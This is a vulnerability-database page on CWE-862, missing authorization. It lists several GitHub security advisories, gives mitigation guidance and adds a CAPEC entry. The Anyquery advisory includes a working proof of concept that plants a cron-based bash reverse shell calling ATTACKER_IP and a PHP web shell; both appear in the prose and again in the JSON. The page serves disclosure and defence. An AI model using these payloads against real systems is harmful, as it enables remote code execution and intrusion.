Common Weakness Enumeration

CWE-862

Allowed-with-Review

Missing Authorization

Abstraction: Class · Status: Incomplete

The product does not perform an authorization check when an actor attempts to access a resource or perform an action.

14539 vulnerabilities reference this CWE, most recent first.

GHSA-XRCF-6JH3-GGVX

Vulnerability from github – Published: 2026-07-14 18:33 – Updated: 2026-07-14 18:33
VLAI
Summary
Anyquery: Arbitrary File Write (AFW) which could lead to Remote Code Execution (RCE) via Unrestricted ATTACH DATABASE in Server Mode
Details

Summary

Anyquery's server mode does not disable or restrict native SQLite disk manipulation commands. Unauthenticated attackers connecting to the MySQL-compatible server port can use the ATTACH DATABASE command to write arbitrary SQLite databases to any path on the victim's filesystem where the process has write permissions. This leads to Arbitrary File Write (AFW) which could lead to Remote Code Execution (RCE) depending on the environment (e.g., by dropping a PHP web shell if a web server is running, or overwriting system cronjobs if running as root).

Details

When Anyquery is launched in Server Mode (anyquery server), it blindly proxies incoming SQL commands to the underlying SQLite engine. SQLite allows dynamic database mounting via the ATTACH DATABASE command, which creates a physical .db file on the filesystem if the file does not exist.

An attacker can connect to the open Anyquery port, attach a new database to a sensitive path (e.g., /var/www/html/shell.php, /etc/cron.d/pwn or /root/.ssh/authorized_keys), create a table, and insert a malicious payload. Although the file will contain a binary SQLite header, standard Linux services like cron, sshd, and web servers like PHP tolerate garbage data and will parse/execute the valid payload lines injected by the attacker.

PoC (Proof of Concept)

  1. Start the server on the victim machine: bash anyquery server --host 0.0.0.0 --port 8070
  2. Connect from an attacker machine: bash mysql -u root -h <VICTIM_IP> -P 8070
  3. Execute the payload to write a malicious cronjob for native RCE (Note: the Anyquery process must have write permissions to the target directory, such as /etc/cron.d or /var/spool/cron/crontabs/): sql ATTACH DATABASE '/etc/cron.d/pwn' AS pwn; CREATE TABLE pwn.task (cmd TEXT); INSERT INTO pwn.task VALUES ('* * * * * root /bin/bash -c "bash -i >& /dev/tcp/ATTACKER_IP/1337 0>&1"');

Alternatively, if a web server is running and the Anyquery process can write to the web root, you can drop a PHP shell: sql ATTACH DATABASE '/var/www/html/shell.php' AS pwn; CREATE TABLE pwn.hacked (cmd TEXT); INSERT INTO pwn.hacked VALUES ('<?php system($_GET["cmd"]); ?>');

If testing locally as a non-root user, you can verify the vulnerability by writing to /tmp: sql ATTACH DATABASE '/tmp/pwn.db' AS pwn; CREATE TABLE pwn.test (cmd TEXT); INSERT INTO pwn.test VALUES ('Hello Anyquery AFW'); Within 60 seconds, the system's cron daemon will ignore the SQLite header, parse the valid cron string, and execute the reverse shell payload with root privileges.

Impact

  • Confidentiality: None (from the write action itself, though combined with LFR it becomes High).
  • Integrity: High. Arbitrary files can be written or overwritten, which corrupts the filesystem.
  • Availability: High. Overwriting critical system files (e.g., configurations, databases) can lead to complete Denial of Service (DoS).
  • CVSS Score: 9.1 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
  • Note: If the process is running with elevated privileges (e.g., root) or inside a web root directory, this escalates to Remote Code Execution (RCE) with a CVSS of 9.8 (Critical).

Remediation

Disable dangerous SQLite functions (ATTACH DATABASE, DETACH DATABASE, etc.) when running in Server Mode. Restrict the MySQL handler so that it only permits operations on the main database or in-memory virtual tables.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c 0.4.5"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/julien040/anyquery"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-50006"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-284",
      "CWE-434",
      "CWE-73",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-14T18:33:57Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "## Summary\nAnyquery\u0027s `server` mode does not disable or restrict native SQLite disk manipulation commands. Unauthenticated attackers connecting to the MySQL-compatible server port can use the `ATTACH DATABASE` command to write arbitrary SQLite databases to any path on the victim\u0027s filesystem where the process has write permissions. This leads to Arbitrary File Write (AFW) which could lead to Remote Code Execution (RCE) depending on the environment (e.g., by dropping a PHP web shell if a web server is running, or overwriting system cronjobs if running as root).\n\n## Details\nWhen Anyquery is launched in **Server Mode** (`anyquery server`), it blindly proxies incoming SQL commands to the underlying SQLite engine. SQLite allows dynamic database mounting via the `ATTACH DATABASE` command, which creates a physical `.db` file on the filesystem if the file does not exist.\n\nAn attacker can connect to the open Anyquery port, attach a new database to a sensitive path (e.g., `/var/www/html/shell.php`, `/etc/cron.d/pwn` or `/root/.ssh/authorized_keys`), create a table, and insert a malicious payload. Although the file will contain a binary SQLite header, standard Linux services like `cron`, `sshd`, and web servers like `PHP` tolerate garbage data and will parse/execute the valid payload lines injected by the attacker.\n\n## PoC (Proof of Concept)\n1. Start the server on the victim machine:\n   ```bash\n   anyquery server --host 0.0.0.0 --port 8070\n   ```\n2. Connect from an attacker machine:\n   ```bash\n   mysql -u root -h \u003cVICTIM_IP\u003e -P 8070\n   ```\n3. Execute the payload to write a malicious cronjob for native RCE (Note: the Anyquery process must have write permissions to the target directory, such as `/etc/cron.d` or `/var/spool/cron/crontabs/`):\n   ```sql\n   ATTACH DATABASE \u0027/etc/cron.d/pwn\u0027 AS pwn;\n   CREATE TABLE pwn.task (cmd TEXT);\n   INSERT INTO pwn.task VALUES (\u0027* * * * * root /bin/bash -c \"bash -i \u003e\u0026 /dev/tcp/ATTACKER_IP/1337 0\u003e\u00261\"\u0027);\n   ```\n\n   *Alternatively, if a web server is running and the Anyquery process can write to the web root, you can drop a PHP shell:*\n   ```sql\n   ATTACH DATABASE \u0027/var/www/html/shell.php\u0027 AS pwn;\n   CREATE TABLE pwn.hacked (cmd TEXT);\n   INSERT INTO pwn.hacked VALUES (\u0027\u003c?php system($_GET[\"cmd\"]); ?\u003e\u0027);\n   ```\n\n   *If testing locally as a non-root user, you can verify the vulnerability by writing to `/tmp`:*\n   ```sql\n   ATTACH DATABASE \u0027/tmp/pwn.db\u0027 AS pwn;\n   CREATE TABLE pwn.test (cmd TEXT);\n   INSERT INTO pwn.test VALUES (\u0027Hello Anyquery AFW\u0027);\n   ```\nWithin 60 seconds, the system\u0027s cron daemon will ignore the SQLite header, parse the valid cron string, and execute the reverse shell payload with root privileges.\n\n## Impact\n- **Confidentiality:** None (from the write action itself, though combined with LFR it becomes High).\n- **Integrity:** High. Arbitrary files can be written or overwritten, which corrupts the filesystem.\n- **Availability:** High. Overwriting critical system files (e.g., configurations, databases) can lead to complete Denial of Service (DoS).\n- **CVSS Score:** 9.1 (Critical) - `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H`\n  - *Note: If the process is running with elevated privileges (e.g., root) or inside a web root directory, this escalates to Remote Code Execution (RCE) with a CVSS of 9.8 (Critical).*\n\n## Remediation\nDisable dangerous SQLite functions (`ATTACH DATABASE`, `DETACH DATABASE`, etc.) when running in Server Mode. Restrict the MySQL handler so that it only permits operations on the main database or in-memory virtual tables.",
  "id": "GHSA-xrcf-6jh3-ggvx",
  "modified": "2026-07-14T18:33:57Z",
  "published": "2026-07-14T18:33:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/julien040/anyquery/security/advisories/GHSA-xrcf-6jh3-ggvx"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/julien040/anyquery"
    },
    {
      "type": "WEB",
      "url": "https://github.com/julien040/anyquery/releases/tag/0.4.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Anyquery: Arbitrary File Write (AFW) which could lead to Remote Code Execution (RCE) via Unrestricted ATTACH DATABASE in Server Mode"
}

GHSA-XRF4-HW94-X283

Vulnerability from github – Published: 2024-10-16 03:31 – Updated: 2024-10-16 03:31
VLAI
Details

The Multiline files upload for contact form 7 plugin for WordPress is vulnerable to unauthorized plugin deactivation due to a missing capability check on the mfcf7_zl_custom_handle_deactivation_plugin_form_submission() function in all versions up to, and including, 2.8.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to deactivate the plugin and send a custom reason from the site.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-9891"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-16T02:15:08Z",
    "severity": "MODERATE"
  },
  "details": "The Multiline files upload for contact form 7 plugin for WordPress is vulnerable to unauthorized plugin deactivation due to a missing capability check on the mfcf7_zl_custom_handle_deactivation_plugin_form_submission() function in all versions up to, and including, 2.8.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to deactivate the plugin and send a custom reason from the site.",
  "id": "GHSA-xrf4-hw94-x283",
  "modified": "2024-10-16T03:31:33Z",
  "published": "2024-10-16T03:31:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9891"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3169228"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/tags/2.8.1/multiline-files-for-contact-form-7/multiline-admin.php#L410"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5cf62f45-a142-497e-9838-ce0b1b1bb3d3?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XRFX-HX2G-WGV7

Vulnerability from github – Published: 2025-08-14 21:31 – Updated: 2026-04-01 18:35
VLAI
Details

Missing Authorization vulnerability in Themovation Stratus allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Stratus: from n/a through 4.2.5.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-53341"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-14T19:15:35Z",
    "severity": "MODERATE"
  },
  "details": "Missing Authorization vulnerability in Themovation Stratus allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Stratus: from n/a through 4.2.5.",
  "id": "GHSA-xrfx-hx2g-wgv7",
  "modified": "2026-04-01T18:35:51Z",
  "published": "2025-08-14T21:31:58Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53341"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Theme/stratusx/vulnerability/wordpress-stratus-theme-theme-4-2-5-broken-access-control-vulnerability?_s_id=cve"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/theme/stratus/vulnerability/wordpress-stratus-theme-theme-4-2-5-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XRG8-RX83-PG44

Vulnerability from github – Published: 2024-06-11 12:31 – Updated: 2024-06-11 12:31
VLAI
Details

Missing Authorization vulnerability in Themeum Tutor LMS.This issue affects Tutor LMS: from n/a through 2.1.8.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-25799"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-06-11T10:15:10Z",
    "severity": "HIGH"
  },
  "details": "Missing Authorization vulnerability in Themeum Tutor LMS.This issue affects Tutor LMS: from n/a through 2.1.8.",
  "id": "GHSA-xrg8-rx83-pg44",
  "modified": "2024-06-11T12:31:01Z",
  "published": "2024-06-11T12:31:01Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25799"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/tutor/wordpress-tutor-lms-plugin-2-1-10-multiple-student-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XRG9-WWRQ-XMX9

Vulnerability from github – Published: 2021-06-16 17:11 – Updated: 2023-10-27 15:33
VLAI
Summary
Missing Authorization in Jenkins Kubernetes CLI Plugin
Details

Jenkins Kubernetes CLI Plugin 1.10.0 and earlier does not perform permission checks in several HTTP endpoints, allowing attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "org.jenkins-ci.plugins:kubernetes-cli"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-21661"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-06-14T19:17:11Z",
    "nvd_published_at": "2021-06-10T15:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Jenkins Kubernetes CLI Plugin 1.10.0 and earlier does not perform permission checks in several HTTP endpoints, allowing attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.",
  "id": "GHSA-xrg9-wwrq-xmx9",
  "modified": "2023-10-27T15:33:07Z",
  "published": "2021-06-16T17:11:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21661"
    },
    {
      "type": "WEB",
      "url": "https://www.jenkins.io/security/advisory/2021-06-10/#SECURITY-2370"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2021/06/10/14"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Missing Authorization in Jenkins Kubernetes CLI Plugin"
}

GHSA-XRM3-38HQ-HP4Q

Vulnerability from github – Published: 2025-06-06 12:30 – Updated: 2026-02-04 15:30
VLAI
Details

A missing authorization vulnerability in Soar Cloud HRD Human Resource Management System through version 7.3.2025.0408 allows remote attackers to modify system settings without prior authorization.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-48784"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-06-06T10:15:24Z",
    "severity": "HIGH"
  },
  "details": "A missing authorization vulnerability in Soar Cloud HRD Human Resource Management System through version 7.3.2025.0408 allows remote attackers to modify system settings without prior authorization.",
  "id": "GHSA-xrm3-38hq-hp4q",
  "modified": "2026-02-04T15:30:27Z",
  "published": "2025-06-06T12:30:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48784"
    },
    {
      "type": "WEB",
      "url": "https://zuso.ai/advisory/za-2025-09"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-XRP3-CVWG-FC64

Vulnerability from github – Published: 2023-11-27 18:31 – Updated: 2023-11-30 21:30
VLAI
Details

The Limit Login Attempts Reloaded WordPress plugin before 2.25.26 is missing authorization on the toggle_auto_update AJAX action, allowing any user with a valid nonce to toggle the auto-update status of the plugin.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-5525"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-11-27T17:15:08Z",
    "severity": "MODERATE"
  },
  "details": "The Limit Login Attempts Reloaded WordPress plugin before 2.25.26 is missing authorization on the `toggle_auto_update` AJAX action, allowing any user with a valid nonce to toggle the auto-update status of the plugin.",
  "id": "GHSA-xrp3-cvwg-fc64",
  "modified": "2023-11-30T21:30:29Z",
  "published": "2023-11-27T18:31:14Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5525"
    },
    {
      "type": "WEB",
      "url": "https://wpscan.com/vulnerability/654bad15-1c88-446a-b28b-5a412cc0399d"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XRPC-HPQ7-F7WX

Vulnerability from github – Published: 2025-01-02 12:32 – Updated: 2026-04-23 15:34
VLAI
Details

Missing Authorization vulnerability in WP Travel WP Travel allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Travel: from n/a through 7.8.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-47224"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-02T12:15:15Z",
    "severity": "HIGH"
  },
  "details": "Missing Authorization vulnerability in WP Travel WP Travel allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Travel: from n/a through 7.8.0.",
  "id": "GHSA-xrpc-hpq7-f7wx",
  "modified": "2026-04-23T15:34:19Z",
  "published": "2025-01-02T12:32:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47224"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/wp-travel/vulnerability/wordpress-wp-travel-plugin-7-5-0-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XRPJ-W92H-G66G

Vulnerability from github – Published: 2026-02-20 18:31 – Updated: 2026-02-25 00:31
VLAI
Details

Missing Authorization vulnerability in GhostPool Aardvark Plugin aardvark-plugin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Aardvark Plugin: from n/a through <= 2.19.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-69297"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-20T16:22:16Z",
    "severity": "HIGH"
  },
  "details": "Missing Authorization vulnerability in GhostPool Aardvark Plugin aardvark-plugin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Aardvark Plugin: from n/a through \u003c= 2.19.",
  "id": "GHSA-xrpj-w92h-g66g",
  "modified": "2026-02-25T00:31:21Z",
  "published": "2026-02-20T18:31:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69297"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/aardvark-plugin/vulnerability/wordpress-aardvark-plugin-plugin-2-19-broken-access-control-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-XRQ3-QH6Q-H4XQ

Vulnerability from github – Published: 2024-10-28 15:31 – Updated: 2024-10-28 15:31
VLAI
Details

In JetBrains Hub before 2024.3.47707 improper access control allowed users to generate permanent tokens for unauthorized services

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-50573"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-28T13:15:08Z",
    "severity": "MODERATE"
  },
  "details": "In JetBrains Hub before 2024.3.47707 improper access control allowed users to generate permanent tokens for unauthorized services",
  "id": "GHSA-xrq3-qh6q-h4xq",
  "modified": "2024-10-28T15:31:15Z",
  "published": "2024-10-28T15:31:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50573"
    },
    {
      "type": "WEB",
      "url": "https://www.jetbrains.com/privacy-security/issues-fixed"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design
  • Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
  • Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Architecture and Design

Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].

Mitigation MIT-4.4
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
Architecture and Design
  • For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
  • One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
System Configuration Installation

Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.

CAPEC-665: Exploitation of Thunderbolt Protection Flaws

An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.